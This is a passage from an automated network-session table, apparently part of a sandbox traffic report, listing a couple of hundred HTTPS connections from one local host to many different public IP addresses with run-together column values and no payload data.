                                            20564192.168.2.2355470221.97.68.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20565192.168.2.236047435.102.6.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20566192.168.2.2354212124.73.79.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20567192.168.2.2352796192.60.104.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20568192.168.2.233356852.190.82.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20569192.168.2.2359122192.122.107.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20570192.168.2.233776679.62.10.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20571192.168.2.2345998113.251.153.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20572192.168.2.233586418.73.188.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20573192.168.2.2358208144.88.23.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20574192.168.2.2349672111.30.217.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20575192.168.2.235984237.159.77.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20576192.168.2.2359610203.229.161.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20577192.168.2.234594831.190.33.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20578192.168.2.235560065.119.120.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20579192.168.2.233572464.37.191.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20580192.168.2.233816087.13.95.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20581192.168.2.2356240130.10.195.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20582192.168.2.2336762156.210.188.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20583192.168.2.2342310195.121.35.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20584192.168.2.2339154126.30.82.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20585192.168.2.2351570200.155.202.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20586192.168.2.233573836.152.161.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20587192.168.2.233540644.57.5.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20588192.168.2.233675452.67.198.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20589192.168.2.2354316116.97.183.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20590192.168.2.2357198131.195.8.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20591192.168.2.235842869.35.50.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20592192.168.2.2336630120.33.251.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20593192.168.2.234638823.124.231.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20594192.168.2.234887085.172.144.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20595192.168.2.2353970165.93.64.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20596192.168.2.2349598161.149.206.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20597192.168.2.233515439.62.94.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20598192.168.2.235283681.244.176.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20599192.168.2.234441865.205.220.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20600192.168.2.234851265.113.192.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20601192.168.2.235007091.77.214.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20602192.168.2.2352168118.87.72.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20603192.168.2.233759837.172.97.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20604192.168.2.2348306118.10.31.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20605192.168.2.2352952173.103.170.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20606192.168.2.233858067.21.231.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20607192.168.2.2339768176.33.2.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20608192.168.2.233924417.58.131.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20609192.168.2.2346510126.156.228.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20610192.168.2.2338486211.129.186.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20611192.168.2.2352116123.157.54.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20612192.168.2.2354062212.34.76.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20613192.168.2.23427825.239.105.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20614192.168.2.2359436111.131.197.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20615192.168.2.2360108173.22.129.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20616192.168.2.234892024.161.17.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20617192.168.2.234197076.25.159.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20618192.168.2.2332832163.16.158.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20619192.168.2.233925645.195.230.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20620192.168.2.234209281.216.225.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20621192.168.2.2339648171.131.207.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20622192.168.2.2348136113.239.229.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20623192.168.2.2343810149.49.164.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20624192.168.2.235523694.109.176.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20625192.168.2.2336060109.48.158.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20626192.168.2.2341834181.176.120.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20627192.168.2.2350974203.181.196.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20628192.168.2.235831258.54.101.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20629192.168.2.2336722148.129.161.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20630192.168.2.2356702102.148.130.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20631192.168.2.234917040.108.18.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20632192.168.2.23581162.170.145.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20633192.168.2.233600420.233.181.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20634192.168.2.235826083.69.195.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20635192.168.2.233818212.205.176.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20636192.168.2.2343534200.238.41.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20637192.168.2.234160284.161.73.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20638192.168.2.234196290.31.248.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20639192.168.2.2355088154.119.133.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20640192.168.2.2351604218.178.25.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20641192.168.2.234573634.110.179.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20642192.168.2.2359742187.254.227.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20643192.168.2.2359522168.134.243.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20644192.168.2.235147025.169.114.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20645192.168.2.2356536190.136.126.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20646192.168.2.2346360140.90.212.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20647192.168.2.235811465.89.122.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20648192.168.2.235432435.21.104.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20649192.168.2.2357276199.158.0.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20650192.168.2.23336925.202.246.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20651192.168.2.2345056211.169.175.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20652192.168.2.234963888.133.105.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20653192.168.2.234160266.47.188.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20654192.168.2.2353232132.156.188.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20655192.168.2.2337662120.216.182.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20656192.168.2.2360880114.68.232.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20657192.168.2.233673686.59.19.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20658192.168.2.2337790209.194.150.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20659192.168.2.233442496.35.77.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20660192.168.2.2344462102.137.131.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20661192.168.2.233525064.13.243.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20662192.168.2.234822447.211.82.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20663192.168.2.2356008181.130.80.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20664192.168.2.2340010109.166.36.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20665192.168.2.2335140158.20.191.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20666192.168.2.235005245.244.91.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20667192.168.2.23478761.64.33.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20668192.168.2.2346728157.204.239.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20669192.168.2.235846281.236.146.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20670192.168.2.2358278102.82.56.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20671192.168.2.2358746140.79.208.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20672192.168.2.2352636218.196.175.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20673192.168.2.2343706126.198.113.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20674192.168.2.2333926102.122.194.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20675192.168.2.2346486145.229.47.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20676192.168.2.2347094177.4.252.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20677192.168.2.2358622148.246.164.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20678192.168.2.2336792179.186.116.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20679192.168.2.2342230217.118.146.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20680192.168.2.23387989.52.181.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20681192.168.2.2358164101.119.160.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20682192.168.2.2348430151.139.191.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20683192.168.2.2333418147.147.189.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20684192.168.2.2356086124.92.210.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20685192.168.2.2336610169.147.50.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20686192.168.2.235149680.218.69.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20687192.168.2.234400499.235.38.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20688192.168.2.2343782126.22.210.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20689192.168.2.234722868.2.87.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20690192.168.2.2359108114.231.236.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20691192.168.2.234178073.173.86.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20692192.168.2.23568241.159.18.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20693192.168.2.234704632.102.12.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20694192.168.2.2341630128.179.164.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20695192.168.2.234230813.254.208.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20696192.168.2.234482876.185.71.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20697192.168.2.2343284195.27.49.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20698192.168.2.2348148121.93.181.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20699192.168.2.2336840128.16.105.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20700192.168.2.233505291.85.185.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20701192.168.2.2358476165.237.13.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20702192.168.2.235257884.125.134.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20703192.168.2.2333126217.67.41.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20704192.168.2.2352774198.105.155.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20705192.168.2.2355068123.227.25.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20706192.168.2.235497296.148.253.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20707192.168.2.2348182161.31.68.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20708192.168.2.2349808167.138.180.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20709192.168.2.2336640132.225.102.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20710192.168.2.235946239.125.68.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20711192.168.2.2342628108.103.220.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20712192.168.2.2338924220.32.1.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20713192.168.2.235175274.25.38.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20714192.168.2.2359436184.41.188.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20715192.168.2.234777278.233.66.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20716192.168.2.2346312115.66.84.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20717192.168.2.2359080149.237.0.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20718192.168.2.2359630209.205.8.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20719192.168.2.2334314151.80.40.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20720192.168.2.2349546171.188.26.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20721192.168.2.234700284.135.32.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20722192.168.2.2351598183.173.142.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20723192.168.2.235537068.55.209.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20724192.168.2.236016412.4.75.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20725192.168.2.2357538177.233.159.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20726192.168.2.234871089.32.231.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20727192.168.2.2336560188.181.105.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20728192.168.2.235934894.37.82.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20729192.168.2.2349574192.45.79.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20730192.168.2.2351662126.147.67.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20731192.168.2.234659451.151.249.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20732192.168.2.2354656216.22.107.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20733192.168.2.2338018188.161.213.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20734192.168.2.234847036.183.22.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20735192.168.2.234380843.175.120.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20736192.168.2.2353086137.172.56.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20737192.168.2.235705079.46.61.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20738192.168.2.235115439.156.221.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20739192.168.2.2342198145.78.165.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20740192.168.2.233308236.183.105.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20741192.168.2.2336466205.36.215.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20742192.168.2.2339684202.173.25.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20743192.168.2.2350468173.47.151.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20744192.168.2.23341769.114.2.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20745192.168.2.235395049.126.244.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20746192.168.2.234990672.74.204.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20747192.168.2.2355230160.54.25.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20748192.168.2.234418438.179.219.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20749192.168.2.2340568159.57.131.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20750192.168.2.236015042.4.182.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20751192.168.2.2360994181.102.40.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20752192.168.2.2342592114.133.128.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20753192.168.2.233987664.189.78.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20754192.168.2.2351668189.65.189.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20755192.168.2.233756681.131.1.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20756192.168.2.2354018110.151.250.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20757192.168.2.2337244183.118.2.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20758192.168.2.2340550155.64.133.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20759192.168.2.2333006198.34.176.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20760192.168.2.235441654.123.53.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20761192.168.2.2346306216.18.67.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20762192.168.2.2347200186.74.197.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20763192.168.2.23402622.8.170.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20764192.168.2.2342576212.170.214.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20765192.168.2.23598645.71.142.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20766192.168.2.233382297.130.207.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20767192.168.2.2338106136.81.98.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20768192.168.2.2337256109.37.6.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20769192.168.2.2352402166.240.47.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20770192.168.2.2348524217.100.147.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20771192.168.2.2340116218.195.47.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20772192.168.2.2351820181.95.6.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20773192.168.2.233629027.29.183.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20774192.168.2.2334898101.5.178.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20775192.168.2.235221694.91.4.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20776192.168.2.2335176128.217.187.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20777192.168.2.2346466161.44.237.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20778192.168.2.234799049.95.93.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20779192.168.2.2358044133.3.102.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20780192.168.2.2350876191.236.168.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20781192.168.2.235234060.53.30.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20782192.168.2.2336600144.255.144.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20783192.168.2.2355482179.21.213.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20784192.168.2.2360524158.204.30.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20785192.168.2.233932673.23.78.67443
                                            TimestampBytes transferredDirectionData


